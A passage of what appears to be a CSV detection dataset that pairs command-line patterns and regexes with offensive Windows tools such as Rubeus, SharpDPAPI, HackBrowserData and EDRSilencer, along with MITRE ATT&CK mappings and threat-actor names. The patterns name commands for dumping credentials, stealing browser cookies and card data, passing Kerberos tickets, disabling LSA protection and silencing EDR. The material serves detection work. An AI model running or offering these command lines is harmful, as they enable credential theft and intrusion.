T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.exe /HistorySource 1 /SaveDirect /scomma *",".{0,1000}\.exe\s\s\/HistorySource\s1\s\/SaveDirect\s\/scomma\s.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1602 - T1119 - T1005","TA0009","N/A","N/A","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*.exe /logonpasswords /symbol*",".{0,1000}\.exe\s\s\/logonpasswords\s\/symbol.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*.exe --b64 --path * --args ",".{0,1000}\.exe\s\s\-\-b64\s\-\-path\s.{0,1000}\s\-\-args\s","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","10","8","759","138","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" "*.exe --buildcache -c *\cache.txt*",".{0,1000}\.exe\s\s\-\-buildcache\s\-c\s.{0,1000}\\cache\.txt.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "*.exe certificates /pvk:*.pvk*",".{0,1000}\.exe\s\scertificates\s\/pvk\:.{0,1000}\.pvk.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "*.exe -group=remote -computername=*",".{0,1000}\.exe\s\s\-group\=remote\s\-computername\=.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*.exe * -eventlog *Key Management Service*",".{0,1000}\.exe\s.{0,1000}\s\-eventlog\s.{0,1000}Key\sManagement\sService.{0,1000}","offensive_tool_keyword","cobaltstrike","Persistence by writing/reading shellcode from Event Log","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/improsec/SharpEventPersist","1","0","N/A","10","10","360","53","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" "*.exe * --source Persistence*",".{0,1000}\.exe\s.{0,1000}\s\-\-source\sPersistence.{0,1000}","offensive_tool_keyword","cobaltstrike","Persistence by writing/reading shellcode from Event Log","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/improsec/SharpEventPersist","1","0","N/A","10","10","360","53","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" "*.exe *.bin -enc aes -lang csharp*",".{0,1000}\.exe\s.{0,1000}\.bin\s\-enc\saes\s\-lang\scsharp.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","6","573","100","2024-04-30T14:35:29Z","2023-08-08T11:30:34Z" "*.exe *-searchforest*-pwdlastset*",".{0,1000}\.exe\s.{0,1000}\-searchforest.{0,1000}\-pwdlastset.{0,1000}","offensive_tool_keyword","Get-RBCD-Threaded","Tool to discover Resource-Based Constrained Delegation attack paths in Active Directory Environments","T1558 - T1208 - T1550 - T1484 - T1486","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/FatRodzianko/Get-RBCD-Threaded","1","0","N/A","N/A","2","117","19","2021-08-10T23:29:48Z","2019-12-21T00:08:28Z" "*.exe .\chrome.DMP*",".{0,1000}\.exe\s\.\\chrome\.DMP.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*.exe .\msedge.DMP*",".{0,1000}\.exe\s\.\\msedge\.DMP.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*.exe /disableLSAProtection*",".{0,1000}\.exe\s\/disableLSAProtection.{0,1000}","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","0","N/A","10","9","815","130","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" "*.exe /gethmac /mode:SHA1 /key:*",".{0,1000}\.exe\s\/gethmac\s\/mode\:SHA1\s\/key\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*.exe /HistorySource 1 /LoadChrome 1 /shtml *",".{0,1000}\.exe\s\/HistorySource\s1\s\/LoadChrome\s1\s\/shtml\s.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1602 - T1119 - T1005","TA0009","N/A","N/A","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*.exe /method:create /taskname:* /trigger:* /modifier:* /program:* /argument:*.dll /remoteserver:*",".{0,1000}\.exe\s\/method\:create\s\/taskname\:.{0,1000}\s\/trigger\:.{0,1000}\s\/modifier\:.{0,1000}\s\/program\:.{0,1000}\s\/argument\:.{0,1000}\.dll\s\/remoteserver\:.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 T1570 T1021 T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","N/A","9","4","311","41","2022-07-05T10:24:45Z","2021-10-12T15:27:32Z" "*.exe 3 cmd*",".{0,1000}\.exe\s3\scmd.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*.exe acl -dn * -scope * -trustee *",".{0,1000}\.exe\sacl\s\-dn\s.{0,1000}\s\-scope\s.{0,1000}\s\-trustee\s.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*.exe --ACLScan * --OU *",".{0,1000}\.exe\s\-\-ACLScan\s.{0,1000}\s\-\-OU\s.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","7","7","619","83","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z" "*.exe action=GetScheduledTaskCOMHandler*",".{0,1000}\.exe\saction\=GetScheduledTaskCOMHandler.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "*.exe action=ListRunningServices*",".{0,1000}\.exe\saction\=ListRunningServices.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "*.exe action=ListScheduledTasks*",".{0,1000}\.exe\saction\=ListScheduledTasks.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "*.exe action=ListTaskNames*",".{0,1000}\.exe\saction\=ListTaskNames.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","425","94","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "*.exe --adcs * --remote *",".{0,1000}\.exe\s\-\-adcs\s.{0,1000}\s\-\-remote\s.{0,1000}","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","0","N/A","10","8","796","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" "*.exe AlwaysInstallElevated*",".{0,1000}\.exe\sAlwaysInstallElevated.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*.exe app /create /name:* /uncpath:*\\*",".{0,1000}\.exe\sapp\s\/create\s\/name\:.{0,1000}\s\/uncpath\:.{0,1000}\\\\.{0,1000}","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","0","N/A","10","3","237","37","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" "*.exe app /deploy /name:* /groupname:* /assignmentname:*",".{0,1000}\.exe\sapp\s\/deploy\s\/name\:.{0,1000}\s\/groupname\:.{0,1000}\s\/assignmentname\:.{0,1000}","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","0","N/A","10","3","237","37","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" "*.exe asktgs /ticket:B64_TGT /service:*",".{0,1000}\.exe\sasktgs\s\/ticket\:B64_TGT\s\/service\:.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","0","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*.exe asktgt /user:* /aes256:* /opsec /ptt*",".{0,1000}\.exe\sasktgt\s\/user\:.{0,1000}\s\/aes256\:.{0,1000}\s\/opsec\s\/ptt.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Rubeus More stealthy variant but requires the AES256 key (see 'Dumping OS credentials with Mimikatz' section)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.exe asktgt /user:* /rc4:* /createnetonly:*cmd.exe*",".{0,1000}\.exe\sasktgt\s\/user\:.{0,1000}\s\/rc4\:.{0,1000}\s\/createnetonly\:.{0,1000}cmd\.exe.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Rubeus Pass the ticket to a sacrificial hidden process. allowing you to e.g. steal the token from this process (requires elevation)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.exe asktgt /user:* /rc4:* /ptt*",".{0,1000}\.exe\sasktgt\s\/user\:.{0,1000}\s\/rc4\:.{0,1000}\s\/ptt.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Rubeus Request a TGT as the target user and pass it into the current session","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.exe --asrep",".{0,1000}\.exe\s\-\-asrep","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*.exe AzureStorage --connectionstring * --filepath * --extensions *",".{0,1000}\.exe\sAzureStorage\s\-\-connectionstring\s.{0,1000}\s\-\-filepath\s.{0,1000}\s\-\-extensions\s.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","123","35","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*.exe -b * -p 'C:\Users\User\AppData\Local\Microsoft\Edge\User Data\Default'*",".{0,1000}\.exe\s\-b\s.{0,1000}\s\-p\s\'C\:\\Users\\User\\AppData\\Local\\Microsoft\\Edge\\User\sData\\Default\'.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","10","10012","1478","2024-05-01T17:51:49Z","2020-06-18T03:24:31Z" "*.exe -b all -f json --dir results -cc*",".{0,1000}\.exe\s\-b\sall\s\-f\sjson\s\-\-dir\sresults\s\-cc.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","10","10012","1478","2024-05-01T17:51:49Z","2020-06-18T03:24:31Z" "*.exe backupkey /nowrap *.pvk*",".{0,1000}\.exe\sbackupkey\s\/nowrap\s.{0,1000}\.pvk.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "*.exe blockedr*",".{0,1000}\.exe\sblockedr.{0,1000}","offensive_tool_keyword","EDRSilencer","A tool uses Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server","T1562.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/netero1010/EDRSilencer","1","0","N/A","10","9","876","119","2024-01-24T15:52:24Z","2023-12-26T04:15:39Z" "*.exe BOOKMARKS*",".{0,1000}\.exe\sBOOKMARKS.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","10","8","747","201","2022-12-08T11:06:46Z","2020-03-01T06:50:15Z" "*.exe CachedGPPPassword*",".{0,1000}\.exe\sCachedGPPPassword.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*.exe certificates /mkfile:*.txt*",".{0,1000}\.exe\scertificates\s\/mkfile\:.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "*.exe Certify -action find -enrolleeSuppliesSubject -clientAuth*",".{0,1000}\.exe\sCertify\s\-action\sfind\s\-enrolleeSuppliesSubject\s\-clientAuth.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*.exe Certify -action find*",".{0,1000}\.exe\sCertify\s\-action\sfind.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*.exe client *:* R:socks*",".{0,1000}\.exe\sclient\s.{0,1000}\:.{0,1000}\sR\:socks.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Chisel proxying - on our compromised target system we connect to this server and tell it to proxy all traffic over it via the reverse SOCKS5 tunnel.","T1071 - T1090 - T1102","N/A","N/A","N/A","POST Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.exe -cmd ""cmd /c whoami""*",".{0,1000}\.exe\s\-cmd\s\""cmd\s\/c\swhoami\"".{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","1592","204","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z" "*.exe compute --sid * --kdskey *",".{0,1000}\.exe\scompute\s\-\-sid\s.{0,1000}\s\-\-kdskey\s.{0,1000}","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","0","N/A","7","2","123","21","2024-04-11T07:51:57Z","2022-02-03T10:32:05Z" "*.exe computername=* command=* username=* password=* nla=true*",".{0,1000}\.exe\scomputername\=.{0,1000}\scommand\=.{0,1000}\susername\=.{0,1000}\spassword\=.{0,1000}\s\snla\=true.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","10","958","453","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*.exe computername=* command=* username=* password=* takeover=true*",".{0,1000}\.exe\scomputername\=.{0,1000}\scommand\=.{0,1000}\susername\=.{0,1000}\spassword\=.{0,1000}\s\stakeover\=true.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","10","958","453","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*.exe computername=* command=* username=* password=* connectdrive=true*",".{0,1000}\.exe\scomputername\=.{0,1000}\scommand\=.{0,1000}\susername\=.{0,1000}\spassword\=.{0,1000}\sconnectdrive\=true.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","10","958","453","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*.exe computername=* command=* username=* password=* elevated=taskmgr*",".{0,1000}\.exe\scomputername\=.{0,1000}\scommand\=.{0,1000}\susername\=.{0,1000}\spassword\=.{0,1000}\selevated\=taskmgr.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","10","958","453","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*.exe computername=* command=* username=* password=* elevated=winr*",".{0,1000}\.exe\scomputername\=.{0,1000}\scommand\=.{0,1000}\susername\=.{0,1000}\spassword\=.{0,1000}\selevated\=winr.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","10","958","453","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*.exe computername=* command=* username=* password=* exec=cmd*",".{0,1000}\.exe\scomputername\=.{0,1000}\scommand\=.{0,1000}\susername\=.{0,1000}\spassword\=.{0,1000}\sexec\=cmd.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","10","10","958","453","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*.exe COOKIES*",".{0,1000}\.exe\sCOOKIES.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","10","8","747","201","2022-12-08T11:06:46Z","2020-03-01T06:50:15Z" "*.exe create /payload* /kb*",".{0,1000}\.exe\screate\s\/payload.{0,1000}\s\/kb.{0,1000}","offensive_tool_keyword","SharpWSUS","SharpWSUS is a CSharp tool for Lateral Movement through WSUS","T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/nettitude/SharpWSUS","1","0","N/A","N/A","5","428","72","2022-11-20T23:41:40Z","2022-05-04T08:27:57Z" "*.exe credentials /pvk:*.pvk*",".{0,1000}\.exe\scredentials\s\/pvk\:.{0,1000}\.pvk.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "*.exe CREDIT_CARDS*",".{0,1000}\.exe\sCREDIT_CARDS.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","10","8","747","201","2022-12-08T11:06:46Z","2020-03-01T06:50:15Z" "*.exe -d * -u * -p * -m LDAPS*",".{0,1000}\.exe\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-m\sLDAPS.{0,1000}","offensive_tool_keyword","SharpLdapRelayScan","SharLdapRealyScan is a tool to check Domain Controllers for LDAP server protections regarding the relay of NTLM authenticationvand it's a C# port of?LdapRelayScan","T1557.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Network Exploitation 